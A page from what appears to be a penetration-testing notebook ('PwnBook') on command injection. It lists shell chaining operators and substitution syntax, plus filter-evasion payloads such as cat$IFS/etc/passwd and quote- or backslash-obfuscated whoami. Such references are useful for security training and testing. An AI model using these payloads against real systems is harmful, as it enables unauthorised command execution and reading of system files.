👾
PwnBook
GitHub
👾
PwnBook
  • 👾Welcome
  • ENUMERATION & EXPLOITATION
    • Reconnaissance
    • Network Services
    • Web Vulnerabilities
      • Command Injection
      • CSRF (Cross Site Request Forgery)
      • File Inclusion
      • File Upload
      • Path Traversal
      • SQL Injection
      • XSS (Cross Site Scripting)
    • Active Directory
      • Capturing NTLM hashes
  • Post Exloitation
    • Reverse Shells
    • File Transfer
    • Privilege Escalation
      • Linux Privilege Escalation
      • Windows Privilege Escalation
    • Pivoting
Powered by GitBook
On this page
  • Chaining and Invoking
  • Bypasses
  • Space Bypass
  • Blacklisted Words
  • References
  1. ENUMERATION & EXPLOITATION
  2. Web Vulnerabilities

Command Injection

Last updated 1 month ago

Chaining and Invoking

;    # Executes one command and then another
&    # Executes a command in the background, followed by the other one
|    # Redirects the output the first command as input to the second command
&&   # Executes the second command if the first command succeeds
||   # Executes the second command if the first command fails

Its also possible to inject command via command substitution, where the output of a command is captured and used in another context

$(command)    # Both windows and linux systems
`command`     # Only linux systems

Bypasses

Space Bypass

Avoid using spaces with Internal Field Separator $IFS . The default value of IFS is a space, a tab, and a newline.

cat$IFS/etc/passwd

Blacklisted Words

# Quotes
w'h'o'a'm'i'     # Both windows and linux systems
'w'h'o'a'm'i     # Only linux systems
wh''oami         # Both windows and linux systems

# Backslashes
\w\h\o\a\m\i     # Only linux systems
w\h\o\a\m\i      # Only linux systems

# $()
wh$()oami        # Only linux systems
wh$(echo oa)mi   # Only linux systems

# ``
wh``oami         # Only linux systems
wh`echo oa`mi    # Only linux systems

# $@
wh$@oami         # Only linux systems

References

https://book.hacktricks.wiki/en/linux-hardening/bypass-bash-restrictions/index.html
https://swisskyrepo.github.io/PayloadsAllTheThings/Command%20Injection/#filter-bypasses
https://swisskyrepo.github.io/PayloadsAllTheThings/Command%20Injection
https://book.hacktricks.xyz/pentesting-web/command-injection